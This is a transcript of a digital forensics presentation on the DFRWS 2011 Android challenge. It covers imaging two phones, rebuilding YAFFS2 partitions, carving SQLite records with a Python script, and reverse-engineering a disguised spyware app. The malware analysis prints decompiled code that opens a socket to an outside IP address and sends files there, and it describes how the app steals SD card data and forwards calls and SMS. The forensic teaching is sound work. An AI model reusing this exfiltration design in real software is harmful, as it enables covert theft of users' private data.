Title: Turning Android inside out (DFRWS 2011 challenge)
TRANSCRIPT
Case description
• Android phone 1: Donald Norby. Dead. What happened?
• Android phone 2: Yob Taog. Data breach at SwiftLogic, intellectual property leaked. Guilty?
Data acquisition
• SD card: regular imaging tools
• NAND contains multiple partitions: an MTD partition mounted on /data and one mounted on /cache
• Case 1: root + dd used. No OOB content!
• Case 2: root + nanddump used (cross-compiled for ARM)
Norby's data
• 9 PDF files in the sdcard/download folder
• The PDF files contain schematics of SwiftLogic
• From cache: carved HTML pages of Taog's social media pages and Google searches
• The cases are linked!
A relevant HTML file
On Norby's phone, in the cache partition: a directory listing page of Apache.
Nice, an IP address, protected by htaccess!
Hm! The origin of the 9 PDF files?
FILE SYSTEM RECONSTRUCTION
Taog's phone
I would really like to perform a keyword search now, but the tools don't understand YAFFS2 images.
Rebuilding the file system
• Use a mobile forensic toolkit (UFED, XRY)
• Use unyaffs2 (http://code.google.com/p/yaffs2utils): doesn't work properly on 'real' images
• Use the Android emulator: extract files using adb
• Rebuild the Linux kernel with YAFFS2 support
YAFFS2 in Linux
1. Clean Ubuntu installation
2. Get the YAFFS2 source repository (http://www.aleph1.co.uk/gitweb?p=yaffs2.git;a=summary)
3. Patch it into the kernel
4. Use nandsim to simulate a NAND device
5. Use nandwrite to write the image to the device. Don't forget the -r switch for the OOB bytes:
   nandwrite -a -r /dev/mtdX ~/DFRWS/mtdX.dd
And presto:
mount /dev/mtdblock0 /mnt/case2/data
fox@server1104:/mnt/case2/data$ ls -l
total 27
drwxrwx--x 1 fox  fox  2048 2011-05-05 04:06 anr
drwxrwx--x 1 fox  fox  2048 2011-05-08 05:09 app
drwxrwx--x 1 fox  fox  2048 1970-01-01 01:02 app-private
drwx------ 1 fox  fox  2048 1970-01-01 01:02 backup
-rw-rw-rw- 1 root root    8 2011-05-11 02:45 cc_data
drwxrwx--x 1 fox  fox  2048 2011-05-08 05:09 dalvik-cache
drwxrwx--x 1 fox  fox  2048 2011-05-08 05:09 data
drwxr-x--- 1 root 1007 2048 1970-01-01 01:02 dontpanic
drwxrwx--x 1 2000 2000 2048 1970-01-01 01:02 local
drwxrwx--- 1 root root 2048 1970-01-01 01:02 lost+found
drwxrwx--t 1 fox  9998 2048 2011-05-11 02:45 misc
drwx------ 1 root root 2048 2011-05-10 22:43 property
drwxrwxr-x 1 fox  fox  2048 2011-05-11 02:42 system
drwxr-xr-x 1 fox  fox  2048 2011-05-07 18:50 tombstones
Note: the owner fox is UID 1000, GID 1000.
A suspicious application
• Perform a keyword search: phone numbers, names, other relevant terms
• Hit on the IP address 50.56.29.109
• /data/dalvik-cache/data@[email protected]@classes.dex
Hmm!
com.andriod.mm
• Not in the Android Market
• data/system/packages.xml: installed on the evening the phone was bought
• Retrieve the APK for reverse engineering: data/apps/com.andriod.mm, unzip it!
• Convert the dex (bytecode) to a regular jar: dex2jar
Analysis of AndroidManifest.xml
<uses-sdk android:minSdkVersion="3" android:targetSdkVersion="4" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />   [!]
<receiver android:name="com.andriod.mm.bootComp">   [!]
    <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE_CHANGED" />
        <action android:name="android.intent.action.BOOT_COMPLETED" />
        <action android:name="android.intent.action.SCREEN_OFF" />
    </intent-filter>
</receiver>   [!]
Use apktool (code.google.com/p/android-apktool/)
[!] marks the permissions and the triggers (the broadcast receiver and its intent filter) of interest.
Analysis of Java code
[…]
private static final String DEFAULTHOST = "50.56.29.109";
private static final int DEFAULTPORT = 10001;
[…]
int sendFile(String s) {
    […]
    socket = SocketFactory.getDefault().createSocket("50.56.29.109", 10001);
    outputstream = socket.getOutputStream();
    outputstream1.write(abyte2, k1, l1);
    […]
Use JD-GUI for decompilation (java.decompiler.free.fr/?q=jdgui)
Apparently files are sent to this server.
Analysis of Java code (2)
• Secretly steals SD card data: on trigger, the SD card is scanned for files; the files are zipped and sent to 50.56.29.109:10001; then SMS "pkg uploaded"
• Monitors calls: SMS "Callin" + number + date/time
• Monitors received text messages and forwards them: SMS "FORWARDED SMS from" + originating address + " at" + date/time + ": ksms" + message
About YAFFS2
• Out of band bytes
• High fragmentation
[Diagram: YAFFS2 chunks of one object (Header, Data 1, Data 2, ...) scattered across the flash]
Challenge
• The user data and cache partitions are YAFFS2 formatted.
• Remember, we don't have the OOB bytes: file reconstruction is very difficult, to say the least
• Regular carving tools perform poorly
• But we really want those SQLite records
SQLite format
[Diagram: B-tree of pages, root page, interior pages, leaf pages. Leaf page layout: page header, cell pointer array, unallocated area, cell content area; each offset in the cell pointer array points at a record]
Data records are here (in the leaf pages)!
Schema and the SQLite signature are stored here (in the root page)!
Pages are not fragmented
The idea
1. Identify SQLite pages in the raw YAFFS2 image by page signature
2. Parse out the records using the cell pointer array
3. Match the anonymous records against predefined templates: analyze the important SQLite databases for their table formats
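A carver in the spirit of the three steps above, added here as an illustration and not the presenters' own tool: it scans a raw image in page-size steps for table-leaf pages by their header signature, decodes every record through the cell pointer array, and keeps the records whose column types match a template. The 1024-byte page size, the 0xFF junk padding and the two call-log rows are constructed sample data standing in for a real dump; overflow pages are not followed.

```python
import os, sqlite3, struct, tempfile
PAGE = 1024  # page size assumed for the constructed sample (the Android-era SQLite default)

def varint(buf, i):  # big-endian SQLite varint at buf[i] -> (value, index after it)
    v = 0
    for n in range(8):
        v = (v << 7) | (buf[i + n] & 0x7F)
        if buf[i + n] < 0x80: return v, i + n + 1
    return (v << 8) | buf[i + 8], i + 9  # a 9th byte carries all 8 bits
def decode_value(buf, i, st):  # one column of record serial type st -> (value, next index)
    if st == 0 or st in (8, 9):
        return (None if st == 0 else st - 8), i  # NULL, or literal 0 / 1 with no body bytes
    if st <= 6:  # signed big-endian ints of 1, 2, 3, 4, 6 or 8 bytes
        n = (0, 1, 2, 3, 4, 6, 8)[st]
        return int.from_bytes(buf[i:i + n], 'big', signed=True), i + n
    if st == 7: return struct.unpack('>d', buf[i:i + 8])[0], i + 8  # IEEE double
    n = (st - 12) // 2  # 12 and up: BLOB (even) or TEXT (odd)
    return (buf[i:i + n] if st % 2 == 0 else buf[i:i + n].decode('utf-8', 'replace')), i + n
def parse_leaf_page(page):  # signature check, then walk the cell pointer array and decode each record
    ncells, content = struct.unpack('>HH', page[3:7])
    if page[0] != 0x0D or not ncells or not 8 + 2 * ncells <= (content or 65536) <= len(page):
        return []  # not a plausible table-leaf page (type byte 0x0D, sane cell count / content offset)
    rows = []
    for c in range(ncells):
        i = struct.unpack('>H', page[8 + 2 * c:10 + 2 * c])[0]
        _payload, i = varint(page, i)  # payload size; overflow pages are not followed here
        rowid, i = varint(page, i)
        hdr_len, j = varint(page, i)
        body, types, vals = i + hdr_len, [], []
        while j < body:  # record header: one serial type per column
            st, j = varint(page, j); types.append(st)
        for st in types:  # record body follows the header
            v, body = decode_value(page, body, st); vals.append(v)
        rows.append((rowid, tuple(vals)))
    return rows
def carve(image, template):  # page-signature scan; keep records whose column types match template
    hits = []
    for pos in range(0, len(image) - PAGE + 1, PAGE):
        hits += [(r, v) for r, v in parse_leaf_page(image[pos:pos + PAGE])
                 if len(v) == len(template) and all(isinstance(x, t) for x, t in zip(v, template))]
    return hits
def build_sample_image():  # constructed sample: a tiny call-log DB between junk pages, stands in for a dump
    fd, path = tempfile.mkstemp(suffix='.db'); os.close(fd)
    con = sqlite3.connect(path); con.execute(f'PRAGMA page_size={PAGE}')  # pragma must precede the first table
    con.execute('CREATE TABLE calls(number TEXT, date TEXT, duration INT, type TEXT)')
    con.executemany('INSERT INTO calls VALUES(?,?,?,?)',
                    [('5550100', '2011-05-08 18:46', 381, 'In'), ('5550199', '2011-05-05 00:04', 91, 'Out')])
    con.commit(); con.close()
    data = open(path, 'rb').read(); os.remove(path)
    return b'\xff' * (3 * PAGE) + data + b'\xff' * PAGE
```

The template (str, str, int, str) plays the role of the predefined table format; on a real dump the page size and templates come from the phone's own databases.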
Results (Contacts)
Calls:
id | number | date/time (utc) | duration | type | name
1 | 4439264768 | 05/04/2011 11:31:08 PM | 341 | Out | Mr B
2 | 4124623802 | 05/05/2011 12:04:01 AM | 91 | Out |
3 | 4439264768 | 05/05/2011 12:38:17 AM | 115 | Out | Mr B
4 | 4124623802 | 05/05/2011 03:18:33 PM | 84 | Out |
5 | 4439264768 | 05/08/2011 06:46:24 PM | 381 | In | Mr B
Contacts:
id | display name | extra info
1 | Mr B | mre@hushmail.com • 443-926-4768 • Mr B
2 | Taog | Taog Taog • 4124393388
3 | mr e | 4439264768 • mr
Results (SMS)
id | number | date/time | flag | status | message (records carved in more than one version are all listed; [?] = glyph not recoverable)
154 | 4124393388 | 05/08/2011 04:12:16 AM | 1 | in | ksmsv[?]wsms://message/pkg uploaded[?]
154 | 4124393388 | 05/08/2011 04:12:16 AM | 0 | in | ksmsv[?]wsms://message/pkg uploaded[?]
155 | | 05/08/2011 04:13:48 AM | 1 | draft | Got something for you, sample shortly
155 | | 05/08/2011 05:31:28 PM | 1 | draft | Got something for you, sample shortly
155 | 4439264768 | 05/08/2011 06:05:34 PM | 1 | pending | Got some results, I think we need to up the fee, say double?
155 | 4439264768 | 05/08/2011 06:05:34 PM | 1 | out | Got some results, I think we need to up the fee, say double?
156 | 4439264768 | 05/08/2011 06:16:14 PM | 0 | in | You are joking, right? You can't seriously think about changing the deal now.
156 | 4439264768 | 05/08/2011 06:16:14 PM | 1 | in | You are joking, right? You can't seriously think about changing the deal now.
157 | 4439264768 | 05/08/2011 06:22:39 PM | 1 | pending | I just sent you a sample, I think you'll be pleased...
157 | 4439264768 | 05/08/2011 06:22:39 PM | 1 | out | I just sent you a sample, I think you'll be pleased...
158 | 4439264768 | 05/08/2011 06:30:13 PM | 0 | in | You are serious then. I can see the information is valuable but I am displeased with you breaking the deal.
158 | 4439264768 | 05/08/2011 06:30:13 PM | 1 | in | You are serious then. I can see the information is valuable but I am displeased with you breaking the deal.
159 | 4439264768 | 05/08/2011 06:56:44 PM | 1 | pending | I knew you'd like them, ill be at the agreed spot, in about 25 min for the exchange
159 | 4439264768 | 05/08/2011 06:56:44 PM | 1 | out | I knew you'd like them, ill be at the agreed spot, in about 25 min for the exchange
Results (Browser)
Saved passwords:
id | host | username | password
1 | 50.56.29.109 | norby | aaasspp
History:
Id | Date/time | Title | URL | Visits
34 | 05/06/2011 06:27:36 PM | yob_taog - Twitter Search | http://search.twitter.com/search?q=yob_taog | 1
34 | 05/06/2011 06:27:36 PM | | http://search.twitter.com/search?q=yob_taog | 1
35 | 05/06/2011 06:27:47 PM | | http://m.twitter.com/yob_taog | 1
36 | 05/06/2011 06:27:47 PM | Twitter | http://mobile.twitter.com/yob_taog | 1
36 | 05/06/2011 06:27:47 PM | | http://mobile.twitter.com/yob_taog | 1
37 | 05/06/2011 06:28:09 PM | Twitpic - Share photos and videos on Twitter | http://twitpic.com/4tscf6 | 1
37 | 05/06/2011 06:28:09 PM | | http://twitpic.com/4tscf6 | 1
38 | 05/06/2011 06:28:26 PM | Twitpic - Share photos and videos on Twitter | http://twitpic.com/4tvmcu | 1
38 | 05/06/2011 06:28:26 PM | | http://twitpic.com/4tvmcu | 1
16 | 05/08/2011 05:58:34 PM | | http://www.google.com/m?source=android-home | 3
39 | 05/08/2011 05:59:28 PM | | http://50.56.29.109/ss/ | 1
39 | 05/08/2011 05:59:28 PM | Index of /ss | http://50.56.29.109/ss/ | 1
39 | 05/08/2011 06:28:05 PM | Index of /ss | http://50.56.29.109/ss/ | 2
Creating the time line
• Normalize all times to UTC
• Determine the time zone of each source
• Analyst's Notebook for the timeline